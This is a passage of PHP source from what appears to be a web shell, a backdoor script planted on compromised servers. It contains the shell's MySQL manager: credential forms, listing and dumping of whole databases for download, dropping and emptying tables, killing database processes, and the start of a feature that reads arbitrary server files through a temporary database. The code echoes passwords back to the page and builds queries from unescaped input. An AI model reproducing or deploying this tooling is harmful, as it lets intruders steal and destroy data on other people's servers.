3240$sqlquicklaunch[] = array("Server variables",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=servervars");
3241$sqlquicklaunch[] = array("Processes",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=processes");
3242$sqlquicklaunch[] = array("Logout",$surl."x=sql");
3243echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") Server: ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br/>";
3244if (count($sqlquicklaunch) > 0) {
3245foreach($sqlquicklaunch as $item) {
3246echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
3247}
3248}
3249}
3250echo "</div>";
3251echo "<table class='tab'><tr>";
3252if (!$sql_sock) {
3253echo '<td>
3254<form name="f_sql" action="'.$surl.'x=sql" method="POST">
3255<input type="hidden" name="x" value="sql">
3256<table class="tabnet" style="padding:1px;">
3257<tr><th colspan="2">Mysql Manager</th></tr>
3258<tr><td>Username</td><td><input type="text" name="sql_login" value="" style="width:250px;" class="inputz"></td></tr>
3259<tr><td>Password</td><td><input type="password" name="sql_passwd" value="" style="width:250px;" class="inputz"></td></tr>
3260<tr><td>Database</td><td><input type="text" name="sql_db" value="" style="width:250px;" class="inputz"></td></tr>
3261<tr><td>Host</td><td><input type="text" name="sql_server" value="localhost" class="inputz"></td></tr>
3262<tr><td>Port</td><td><input type="text" name="sql_port" value="3306" size="3" class="inputz"></td></tr>
3263<tr><th colspan="5"><input type="submit" value="Connect" class="inputzbut"></th></tr>
3264</table>
3265</form>';
3266}
3267else {
3268echo '<td valign="top" style="border:1px solid #333333;">
3269<center>
3270<a href="'.$sql_surl.'"><b class="gaya">HOME</b></a>
3271<hr size="1" noshade>';
3272$result = mysql_list_dbs($sql_sock);
3273if (!$result) { echo mysql_smarterror(); }
3274else {
3275echo '<form action="'.$surl.'x=sql">
3276<input type="hidden" name="x" value="sql">
3277<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
3278<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
3279<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
3280<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
3281<select name="sql_db" onchange="this.form.submit()" style="width:100%;" class="inputz">';
3282$c = 0;
3283$dbs = "";
3284while ($row = mysql_fetch_row($result)) {
3285$dbs .= "\t\t<option value=\"".$row[0]."\"";
3286if (@$sql_db == $row[0]) { $dbs .= " selected"; }
3287$dbs .= ">".$row[0]."</option>\n";
3288$c++;
3289}
3290echo "\t\t<option value=\"\">Databases (".$c.")</option>\n";
3291echo $dbs;
3292}
3293echo '</select>
3294<hr size="1" noshade>
3295</form>
3296</center>';
3297if (isset($sql_db)) {
3298$result = mysql_list_tables($sql_db);
3299if (!$result) {
3300$result = mysql_list_dbs($sql_sock);
3301$num = mysql_num_rows($result);
3302for( $i = 0; $i < $num; $i++ ) {
3303$dbname = mysql_dbname( $result, $i );
3304echo "<table class='tab'><td style='background:#3F3F3F;border:1px solid #202020;border-top: 1px solid #505050;border-left: 1px solid #505050;'><b>+ <a href=\"".$sql_surl."sql_db=".$dbname."\" class=\"gaya\">$dbname</a></b></td></table>"; } }
3305else {
3306echo "\t<table class='tub'><th><a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a></th></table><br/>\n";
3307$c = 0;
3308while ($row = mysql_fetch_array($result)) {
3309$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]);
3310$count_row = mysql_fetch_array($count);
3311echo "\t<b>+ <a class='gaya' href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\">".htmlspecialchars($row[0])."</a></b> (".$count_row[0].")</br></b>\n";
3312mysql_free_result($count);
3313$c++;
3314}
3315if (!$c) { echo "No tables found in database"; }
3316}
3317}
3318echo '</td>';
3319echo '<td style="border:1px solid #333333;" valign="top">';
3320$diplay = TRUE;
3321if (@$sql_db) {
3322if (!is_numeric($c)) { $c = 0; }
3323if ($c == 0) { $c = "no"; }
3324echo "\t<center><b>There are ".$c." table(s) in database: ".htmlspecialchars($sql_db)."";
3325if (count(@$dbquicklaunch) > 0) {
3326foreach($dbsqlquicklaunch as $item) {
3327echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
3328}
3329}
3330echo "</b></center>\n";
3331$xs = array("","dump");
3332if ($sql_x == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
3333elseif ($sql_x == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_x = "query";}
3334elseif ($sql_x == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_x = "dump";}
3335elseif ($sql_x == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
3336elseif ($sql_x == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
3337elseif ($sql_x == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
3338elseif ($sql_x == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
3339elseif ($sql_x == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_x = "query";}
3340elseif ($sql_tbl_x == "insert") {
3341if ($sql_tbl_insert_radio == 1) {
3342$keys = "";
3343$akeys = array_keys($sql_tbl_insert);
3344foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
3345if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
3346$values = "";
3347$i = 0;
3348foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
3349if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
3350$sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
3351$sql_x = "query";
3352$sql_tbl_x = "browse";
3353}
3354elseif ($sql_tbl_insert_radio == 2) {
3355$set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
3356$sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
3357$result = mysql_query($sql_query) or print(mysql_smarterror());
3358$result = mysql_fetch_array($result, MYSQL_ASSOC);
3359$sql_x = "query";
3360$sql_tbl_x = "browse";
3361}
3362}
3363if ($sql_x == "query") {
3364echo "<hr size=\"1\" noshade>";
3365if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br/>".$sql_query_error."<br/>";}
3366if ($sql_query_result or (!$sql_confirm)) {$sql_x = $sql_goto;}
3367if ((!$submit) or ($sql_x)) { echo "<table class='tab'><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br/><br/><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br/><br/><input type=\"hidden\" name=\"sql_x\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\" class=\"inputzbut\"> <input type=\"submit\" value=\"No\" class=\"inputzbut\"></form></td></tr></table>"; }
3368}
3369if (in_array($sql_x,$xs)) {
3370echo '<table class="tab">
3371<tr>
3372<td style="border:1px solid #333333;padding:3px;">
3373<b>Create new table:</b>
3374<form action="'.$surl.'">
3375<input type="hidden" name="x" value="sql">
3376<input type="hidden" name="sql_x" value="newtbl">
3377<input type="hidden" name="sql_db" value="'.htmlspecialchars($sql_db).'">
3378<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
3379<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
3380<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
3381<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
3382<input type="text" name="sql_newtbl" size="20" class="inputz">
3383Fields: <input type="text" name="sql_field" size="3" class="inputz">
3384<input type="submit" value="Create" class="inputzbut">
3385</form>
3386</td>
3387<td style="border:1px solid #333333;padding:3px;"><b>Dump DB:</b>
3388<form action="'.$surl.'">
3389<input type="hidden" name="x" value="sql">
3390<input type="hidden" name="sql_x" value="dump">
3391<input type="hidden" name="sql_db" value="'.htmlspecialchars($sql_db).'">
3392<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
3393<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
3394<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
3395<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
3396<input type="text" name="dump_file" size="30" value="dump_'.getenv("SERVER_NAME").'_'.$sql_db.'_'.date("d-m-Y-H-i-s").'.sql" class="inputz">
3397<input type="submit" name="submit" value="Dump" class="inputzbut">
3398</form>
3399</td>
3400</tr>
3401</table>';
3402if (!empty($sql_x)) { echo "<hr size=\"1\" noshade>"; }
3403if ($sql_x == "newtbl") {
3404echo "<b>";
3405if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
3406echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br/>";
3407}
3408else { echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br/>Reason:</b> ".mysql_smarterror(); }
3409}
3410elseif ($sql_x == "dump") {
3411if (empty($submit)) {
3412$diplay = FALSE;
3413echo "<form method=\"GET\"><input type=\"hidden\" name=\"x\" value=\"sql\"><input type=\"hidden\" name=\"sql_x\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br/><br/>";
3414echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\" class=\"inputz\"><br/><br/>";
3415$v = join (";",$dmptbls);
3416echo "<b>Only tables (explode \";\") :</b> <input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\" class=\"inputz\"><br/><br/>";
3417if ($dump_file) {$tmp = $dump_file;}
3418else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
3419echo "<b>File:</b> <input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\" class=\"inputz\"><br/><br/>";
3420echo "<b>Download: </b> <input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br/><br/>";
3421echo "<b>Save to file: </b> <input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
3422echo "<br/><br/><input type=\"submit\" name=\"submit\" value=\"Dump\" class=\"inputzbut\">";
3423echo "</form>";
3424}
3425else {
3426$diplay = TRUE;
3427$set = array();
3428$set["sock"] = $sql_sock;
3429$set["db"] = $sql_db;
3430$dump_out = "download";
3431$set["print"] = 0;
3432$set["nl2br"] = 0;
3433$set[""] = 0;
3434$set["file"] = $dump_file;
3435$set["add_drop"] = TRUE;
3436$set["onlytabs"] = array();
3437if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
3438$ret = mysql_dump($set);
3439if ($sql_dump_download) {
3440@ob_clean();
3441header("Content-type: application/octet-stream");
3442header("Content-length: ".strlen($ret));
3443header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
3444echo '<table class="tabnet" style="padding:2px;margin:2px;"><tr><td>'.$ret.'</td></tr></table>';
3445exit;
3446}
3447elseif ($sql_dump_savetofile) {
3448$fp = fopen($sql_dump_file,"w");
3449if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
3450else {
3451fwrite($fp,$ret);
3452fclose($fp);
3453echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
3454}
3455}
3456else {echo "<b>Dump: nothing to do!</b>";}
3457}
3458}
3459if ($diplay) {
3460if (!empty($sql_tbl)) {
3461if (empty($sql_tbl_x)) {$sql_tbl_x = "browse";}
3462$count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
3463$count_row = mysql_fetch_array($count);
3464mysql_free_result($count);
3465$tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
3466$tbl_struct_fields = array();
3467while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
3468if (@$sql_ls > @$sql_le) { $sql_le = $sql_ls + $perpage; }
3469if (empty($sql_tbl_page)) { $sql_tbl_page = 0; }
3470if (empty($sql_tbl_ls)) { $sql_tbl_ls = 0; }
3471if (empty($sql_tbl_le)) { $sql_tbl_le = 30; }
3472$perpage = $sql_tbl_le - $sql_tbl_ls;
3473if (!is_numeric($perpage)) { $perpage = 10; }
3474$numpages = $count_row[0]/$perpage;
3475$e = explode(" ",$sql_order);
3476if (count($e) == 2) {
3477if ($e[0] == "d") { $asc_desc = "DESC"; }
3478else { $asc_desc = "ASC"; }
3479$v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
3480}
3481else {$v = "";}
3482$query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
3483$result = mysql_query($query) or print(mysql_smarterror());
3484echo "<center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
3485echo "<hr size=\"1\" noshade>";
3486echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=structure\">[<b> Structure </b>]</a> ";
3487echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=browse\">[<b> Browse </b>]</a> ";
3488echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_x=tbldump&thistbl=1\">[<b> Dump </b>]</a> ";
3489echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=insert\">[ <b>Insert</b> ]</a> ";
3490if ($sql_tbl_x == "structure") { echo "<b>Under construction!</b>"; }
3491if ($sql_tbl_x == "insert") {
3492if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
3493if (!empty($sql_tbl_insert_radio)) { echo "<b>Under construction!</b>"; }
3494else {
3495echo "<hr size=\"1\" noshade><br/><b>Inserting row into table:</b><br/>";
3496if (!empty($sql_tbl_insert_q)) {
3497$sql_query = "SELECT * FROM `".$sql_tbl."`";
3498$sql_query .= " WHERE".$sql_tbl_insert_q;
3499$sql_query .= " LIMIT 1;";
3500$result = mysql_query($sql_query,$sql_sock) or print("<br/><br/>".mysql_smarterror());
3501$values = mysql_fetch_assoc($result);
3502mysql_free_result($result);
3503}
3504else {$values = array();}
3505echo "<form method=\"POST\"><table width=\"1%\" class='tub'><tr><th><b>Field</b></th><th><b>Type</b></th><th><b>Function</b></th><th><b>Value</b></th></tr>";
3506foreach ($tbl_struct_fields as $field) {
3507$name = $field["Field"];
3508if (empty($sql_tbl_insert_q)) {$v = "";}
3509echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\" class=\"inputz\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50 class=\"inputz\"></td></tr>";
3510$i++;
3511}
3512echo "</table><br/>";
3513echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
3514if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
3515echo "<br/><br/><input type=\"submit\" value=\"Confirm\" class=\"inputzbut\"></form>";
3516}
3517}
3518if ($sql_tbl_x == "browse") {
3519$sql_tbl_ls = abs($sql_tbl_ls);
3520$sql_tbl_le = abs($sql_tbl_le);
3521echo "<hr size=\"1\" noshade>";
3522echo "<b>Page: </b>";
3523$b = 0;
3524for($i=0;$i<$numpages;$i++) {
3525if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
3526echo $i;
3527if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
3528if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br/>";}
3529else { echo " "; }
3530}
3531if ($i == 0) {echo "empty";}
3532echo "<br/><br/><form method=\"GET\"><input type=\"hidden\" name=\"x\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b> <input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\" class=\"inputz\"> <b>To:</b> <input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\" class=\"inputz\"> <input type=\"submit\" value=\"View\" class=\"inputzbut\"></form>";
3533echo "<br/><form method=\"POST\">\n";
3534echo "<table class='tub'><tr>";
3535echo "<th width=\"25px\"><input type=\"checkbox\" onclick=\"checkAll(this)\" /></th>";
3536for ($i=0;$i<mysql_num_fields($result);$i++) {
3537$v = mysql_field_name($result,$i);
3538if ($e[0] == "a") {$s = "d"; $m = "asc";}
3539else {$s = "a"; $m = "desc";}
3540echo "<th>";
3541if (empty($e[0])) {$e[0] = "a";}
3542if (@$e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
3543else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."x=img&img=sort_".$m."\" alt=\"".$m."\"></a>";}
3544echo "</th>";
3545}
3546echo "<th><font color=\"#00FF00\"><b>action</b></font></th>";
3547echo "</tr>";
3548while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
3549echo "<tr>";
3550$w = "";
3551$i = 0;
3552foreach ($row as $k=>$v) {
3553$name = mysql_field_name($result,$i);
3554$w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;
3555}
3556if (count($row) > 0) { $w = substr($w,0,strlen($w)-3); }
3557echo "<td align='center' style='padding:0px;width:25px;'><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\" onchange=\"hilite(this);\"></td>";
3558$i = 0;
3559foreach ($row as $k=>$v) {
3560$v = htmlspecialchars($v);
3561if ($v == "") { $v = "<font color=\"#00FF00\">NULL</font>"; }
3562echo "<td>".$v."</td>";
3563$i++;
3564}
3565echo "<td>";
3566echo "<a href=\"".$sql_surl."sql_x=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">Delete</a>";
3567echo " | ";
3568echo "<a href=\"".$sql_surl."sql_tbl_x=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\">Edit</a> ";
3569echo "</td>";
3570echo "</tr>";
3571}
3572mysql_free_result($result);
3573echo "</table><hr size=\"1\" noshade><p align=\"left\"><input type=\"checkbox\" onclick=\"checkAll(this)\" name=\"dis\"/> <select name=\"sql_x\" class=\"inputz\">";
3574echo "<option value=\"\">With selected:</option>";
3575echo "<option value=\"deleterow\">Delete</option>";
3576echo "</select> <input type=\"submit\" value=\"Confirm\" class=\"inputzbut\"></form></p>";
3577}
3578}
3579else {
3580$result = mysql_query("SHOW TABLE STATUS", $sql_sock);
3581if (!$result) { echo mysql_smarterror(); }
3582else {
3583echo '<form method="POST">
3584<table class="tub">
3585<tr><th width="25px"><input type="checkbox" onclick="checkAll(this)" /></th><th>Table</th><th>Rows</th><th>Engine</th><th>Created</th><th>Modified</th><th>Size</th><th>Action</th></tr>';
3586$i = 0;
3587$tsize = $trows = 0;
3588while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
3589$tsize += $row["Data_length"];
3590$trows += $row["Rows"];
3591$size = view_size($row["Data_length"]);
3592echo'<tr>
3593<td align="center" style="padding:0px;width:25px;"><input type="checkbox" name="boxtbl[]" value="'.$row["Name"].'" onchange="hilite(this);"></td>
3594<td><a href="'.$sql_surl.'sql_tbl='.urlencode($row["Name"]).'" class="gaya"><b>'.$row["Name"].'</b></a></td>
3595<td>'.$row["Rows"].'</td><td>'.$row["Engine"].'</td><td>'.$row["Create_time"].'</td><td>'.$row["Update_time"].'</td><td>'.$size.'</td>
3596<td><a href="'.$sql_surl.'sql_x=query&sql_query='.urlencode("DELETE FROM `".$row["Name"]."`").'">Empty</a> | <a href="'.$sql_surl.'sql_x=query&sql_query='.urlencode("DROP TABLE `".$row["Name"]."`").'">Drop</a> | <a href="'.$sql_surl.'sql_tbl_x=insert&sql_tbl='.$row["Name"].'">Insert</a></td>
3597</tr>';
3598$i++;
3599}
3600echo "\t\t<tr>\n".
3601"\t\t<th><input type=\"checkbox\" onclick=\"checkAll(this)\" /></th><th>$i table(s)</th><th>$trows</th><th>$row[1]</th><th>$row[10]</th><th>$row[11]</th><th>".view_size($tsize)."</th><th></th>\n";
3602echo'</tr>
3603</table>
3604<br/>
3605<div align="right">
3606<select name="sql_x" class="inputz">
3607<option value="">With selected:</option>
3608<option value="tbldrop">Drop</option>
3609<option value="tblempty">Empty</option>";
3610<option value="tbldump">Dump</option>";
3611<option value="tblcheck">Check table</option>";
3612<option value="tbloptimize">Optimize table</option>";
3613<option value="tblrepair">Repair table</option>";
3614<option value="tblanalyze">Analyze table</option>";
3615</select>
3616<input type="submit" value="Confirm" class="inputzbut">
3617</div>
3618</form>';
3619mysql_free_result($result);
3620}
3621}
3622}
3623}
3624}
3625else {
3626$xs = array("","newdb","serverstatus","servervars","processes","getfile");
3627if (in_array($sql_x,$xs)) {
3628echo '<table class="tab">
3629<tr>
3630<td style="border:1px solid #333333;padding:3px;"><b>Create new DB:</b>
3631<form action="'.$surl.'">
3632<input type="hidden" name="x" value="sql">
3633<input type="hidden" name="sql_x" value="newdb">
3634<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
3635<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
3636<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
3637<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
3638<input type="text" name="sql_newdb" size="20" class="inputz">
3639<input type="submit" value="Create" class="inputzbut">
3640</form>
3641</td>
3642<td style="border:1px solid #333333;padding:3px;"><b>View File:</b>
3643<form action="'.$surl.'">
3644<input type="hidden" name="x" value="sql">
3645<input type="hidden" name="sql_x" value="getfile">
3646<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
3647<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
3648<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
3649<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
3650<input type="text" name="sql_getfile" size="30" value="'.htmlspecialchars($sql_getfile).'" class="inputz">
3651<input type="submit" value="Get" class="inputzbut">
3652</form>
3653</td>
3654</tr>
3655</table>';
3656}
3657if (!empty($sql_x)) {
3658echo "<hr size=\"1\" noshade>";
3659if ($sql_x == "newdb") {
3660echo "<b>";
3661if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br/>";}
3662else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br/>Reason:</b> ".mysql_smarterror();}
3663}
3664if ($sql_x == "serverstatus") {
3665$result = mysql_query("SHOW STATUS", $sql_sock);
3666echo "<center><b>Server status variables:</b><br/><br/>";
3667echo "<table class='tub'><th><b>Name</b></th><th><b>Value</b></th></tr>";
3668while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
3669echo "</table></center>";
3670mysql_free_result($result);
3671}
3672if ($sql_x == "servervars") {
3673$result = mysql_query("SHOW VARIABLES", $sql_sock);
3674echo "<center><b>Server variables:</b><br/><br/>";
3675echo "<table class='tub'><th><b>Name</b></th><th><b>Value</b></th></tr>";
3676while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
3677echo "</table>";
3678mysql_free_result($result);
3679}
3680if ($sql_x == "processes") {
3681if (!empty($kill)) {
3682$query = "KILL ".$kill.";";
3683$result = mysql_query($query, $sql_sock);
3684echo "<b>Process #".$kill." was killed.</b>";
3685}
3686$result = mysql_query("SHOW PROCESSLIST", $sql_sock);
3687echo "<center><b>Processes:</b><br/><br/>";
3688echo "<table class='tub'><th><b>ID</b></th><th><b>USER</b></th><th><b>HOST</b></th><th><b>DB</b></th><th><b>COMMAND</b></th><th><b>TIME</b></th><th><b>STATE</b></th><th><b>INFO</b></th><th><b>Action</b></th></tr>";
3689while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_x=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
3690echo "</table>";
3691mysql_free_result($result);
3692}
3693if ($sql_x == "getfile") {
3694$tmpdb = $sql_login."_tmpdb";
3695$select = mysql_select_db($tmpdb);
3696if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
3697if ($select) {
3698$created = FALSE;
